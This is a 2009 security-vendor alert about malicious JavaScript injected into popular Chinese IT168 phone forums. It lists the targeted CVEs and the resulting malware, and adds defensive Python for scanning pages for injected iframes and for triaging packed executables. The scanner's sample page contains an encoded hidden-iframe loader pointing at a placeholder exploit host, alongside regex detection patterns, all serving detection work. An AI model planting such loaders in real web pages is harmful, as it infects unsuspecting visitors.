Security Labs


The Cell Phone Forums of IT168.com Injection

Date: 08.25.2009

Threat Type: Malicious Web Site / Malicious Code

Websense® Security Labs™ ThreatSeeker™ Network has discovered that several well-known cell phone forums on IT168 in China have been injected with malicious JavaScript. The compromised forums, including those for Nokia, Motorola, and Sony Ericsson, serve exploits for a number of vulnerabilities that are being actively exploited in the wild.

IT168.com is one of the largest mainstream IT information portals in China, providing IT product pricing and market information. It has a high Alexa rank of 170. The forums on the site, especially the cell phone bulletin boards, are very popular, and unsuspecting visitors to these pages can easily be infected.

Screenshot of bbs.it168.com:

Screenshot of the injected JavaScript:

The payload of the JavaScript:

The attackers capitalize on the forums' prominence in the results of popular search engines such as Google, Baidu, and Sogou to spread the malicious code.

The payload of the iframe above:
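A quick way to check a saved copy of a forum page for this kind of injection is to parse it for hidden iframes, third-party script or iframe sources, and the obfuscation idioms injected loaders typically use (document.write of unescape'd markup, eval of encoded strings, long %XX or fromCharCode blobs). The scanner below is an added example, not Websense's tooling, and knows nothing about the actual IT168 script; the sample page, its hostnames and the heuristics are assumptions made for the example.

```python
"""Scan a saved forum page for drive-by injection indicators.

Added example for this alert; not Websense's tool and not the actual IT168
payload. SAMPLE_PAGE and its hostnames are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Obfuscation idioms common in injected loaders (heuristics, not signatures).
OBFUSCATION_PATTERNS = {
    "document.write(unescape(...))": re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
    "eval(unescape(...))": re.compile(r"eval\s*\(\s*unescape\s*\(", re.I),
    "long %XX blob": re.compile(r"(?:%[0-9A-Fa-f]{2}){40,}"),
    "long fromCharCode chain": re.compile(r"String\.fromCharCode\s*\((?:\s*\d+\s*,){20,}", re.I),
}


def _host(url):
    """Hostname of an absolute URL, or '' for relative/empty URLs."""
    return (urlparse(url).hostname or "").lower()


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings: hidden iframes, third-party
    script/iframe sources, and obfuscated inline scripts."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._script = None  # text chunks while inside <script>, else None

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        src = attrs.get("src", "")
        if tag == "iframe":
            if self._is_hidden(attrs):
                self.findings.append(("hidden_iframe", src))
            elif _host(src) and _host(src) != self.site_host:
                self.findings.append(("third_party_iframe", src))
        elif tag == "script":
            self._script = []
            if _host(src) and _host(src) != self.site_host:
                self.findings.append(("third_party_script", src))

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script)
            self._script = None
            for label, pattern in OBFUSCATION_PATTERNS.items():
                if pattern.search(body):
                    self.findings.append(("obfuscated_script", label))

    @staticmethod
    def _is_hidden(attrs):
        style = attrs.get("style", "").replace(" ", "").lower()

        def dim(key):
            return attrs.get(key, "").strip().lower().rstrip("px").strip()

        return (dim("width") in ("0", "1") or dim("height") in ("0", "1")
                or "display:none" in style or "visibility:hidden" in style
                or re.search(r"(?:top|left):-\d", style) is not None)


def scan_html(html, site_host):
    parser = InjectionScanner(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


def is_suspicious(findings):
    """Hidden iframes and obfuscated inline scripts are strong signals;
    third-party sources alone are only worth a look."""
    return any(kind in ("hidden_iframe", "obfuscated_script") for kind, _ in findings)


# Constructed sample: a forum page with an injected loader (hosts are placeholders).
SAMPLE_PAGE = """<html><head><title>Nokia forum - thread</title>
<script src="http://bbs.it168.com/js/forum.js"></script></head><body>
<div class="post">Firmware question</div>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fexploit-host.invalid%2Fin.htm%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E"));</script>
<iframe src="http://exploit-host.invalid/ad.htm" width="0" height="0" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE, "bbs.it168.com"):
        print(f"{kind:20} {detail}")
```

Loaders of this kind are frequently served only to some visitors (depending on Referer, User-Agent, or a cookie set on first visit), so scan the page as a browser would receive it: fetch with a browser-like User-Agent, and, given the search-engine angle above, once with a Referer from one of those engines and once without, and compare the two copies.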

The targeted vulnerabilities are:

CVE-2007-0071 (Adobe Flash Player, DefineSceneAndFrameLabelData integer overflow)
CVE-2008-0015 (Microsoft Video ActiveX Control, msvidctl.dll, patched in MS09-032)
CVE-2009-1136 (Microsoft Office Web Components Spreadsheet ActiveX control, patched in MS09-043)
CVE-2009-1862 (Adobe Reader/Acrobat and Flash Player, authplay.dll)
MS09-002 (Internet Explorer cumulative update)
MS06-014 (MDAC RDS.Dataspace ActiveX control)

Once one of the exploits succeeds, an executable is downloaded to the user's machine and run. This dropper installs a rootkit driver and also downloads the main "threat dispatcher". In total, at least 29 malicious applications are downloaded. Some of them install global hooks on the machine, copy themselves into the Windows folder, and perform other malicious activities. Most of these executables are packed with UPX, but a few use custom executable packers.
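When triaging a batch of dropped executables like this, the first question is usually whether each one is packed, and with what. The script below is an added example (not Websense's analysis code): it parses the PE section table with the standard library only and flags well-known packer section names (UPX0/UPX1 for UPX), sections that are empty on disk but large in memory (the UPX unpack destination), and high-entropy sections, which is what catches the custom packers the alert mentions. The two images it examines are constructed in-memory PE stubs built by build_pe() with correct headers and section tables but no runnable code, and the section names, sizes and thresholds are assumptions for the example.

```python
"""Triage dropped executables for packing by section name and entropy.

Added example for this alert; not Websense's analysis code. PACKED_SAMPLE and
CLEAN_SAMPLE are constructed PE stubs (valid headers, not loadable programs).
"""
import math
import random
import struct
from collections import Counter

# Section names written by well-known packers (UPX is what the alert reports).
PACKER_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2", b".aspack", b".adata", b".petite"}
ENTROPY_THRESHOLD = 7.0  # bits per byte; compressed or encrypted data sits near 8.0


def shannon_entropy(data):
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(blob):
    """Parse the COFF section table of a PE image; one dict per section."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", blob, coff + 2)[0]
    opt_size = struct.unpack_from("<H", blob, coff + 16)[0]
    table = coff + 20 + opt_size  # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        name, vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", blob, table + 40 * i)
        raw = blob[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({"name": name.rstrip(b"\0"), "virtual_size": vsize,
                         "raw_size": raw_size, "entropy": shannon_entropy(raw)})
    return sections


def triage(blob):
    """Return {'packed': bool, 'reasons': [...], 'sections': [...]}."""
    sections = pe_sections(blob)
    reasons = []
    for s in sections:
        name = s["name"].decode("ascii", "replace")
        if s["name"] in PACKER_SECTION_NAMES:
            reasons.append(f"packer section name {name}")
        # UPX0 pattern: zero bytes on disk, large in memory (the unpack destination).
        if s["raw_size"] == 0 and s["virtual_size"] >= 0x1000:
            reasons.append(f"{name} is empty on disk but {s['virtual_size']:#x} bytes virtual")
        # Custom packers rename sections but still carry compressed/encrypted blobs.
        if s["raw_size"] >= 256 and s["entropy"] > ENTROPY_THRESHOLD:
            reasons.append(f"{name} entropy {s['entropy']:.2f} bits/byte")
    return {"packed": bool(reasons), "reasons": reasons, "sections": sections}


def build_pe(sections):
    """Constructed PE stub: DOS header, PE signature, COFF header, zeroed PE32
    optional header, section table and raw data. Only fields pe_sections() reads are set."""
    opt_size = 224  # size of a PE32 optional header
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + bytes(opt_size - 2)
    ptr = 0x40 + 4 + 20 + opt_size + 40 * len(sections)  # first raw data offset
    table, body = b"", b""
    for name, raw, vsize in sections:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, 0,
                             len(raw), ptr if raw else 0, 0, 0, 0, 0, 0)
        body += raw
        ptr += len(raw)
    return bytes(dos) + b"PE\0\0" + coff + opt + table + body


_rng = random.Random(2009)  # deterministic stand-in for compressed data
PACKED_SAMPLE = build_pe([
    (b"UPX0", b"", 0x8000),
    (b"UPX1", bytes(_rng.randrange(256) for _ in range(4096)), 0x3000),
    (b".rsrc", bytes(64), 64),
])
CLEAN_SAMPLE = build_pe([
    (b".text", b"\x55\x8b\xec\x8b\x45\x08\xc3" * 200, 1400),
    (b".data", bytes(256), 256),
])

if __name__ == "__main__":
    for label, blob in (("packed", PACKED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        result = triage(blob)
        print(label, "packed" if result["packed"] else "not packed", result["reasons"])
```

Entropy alone is noisy (resource sections with embedded images or certificates also score high), so treat a single high-entropy section as a prompt to look closer rather than a verdict; a UPX0/UPX1 pair with an empty first section is the unambiguous case.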

Websense Messaging and Websense Web Security customers are protected against this attack.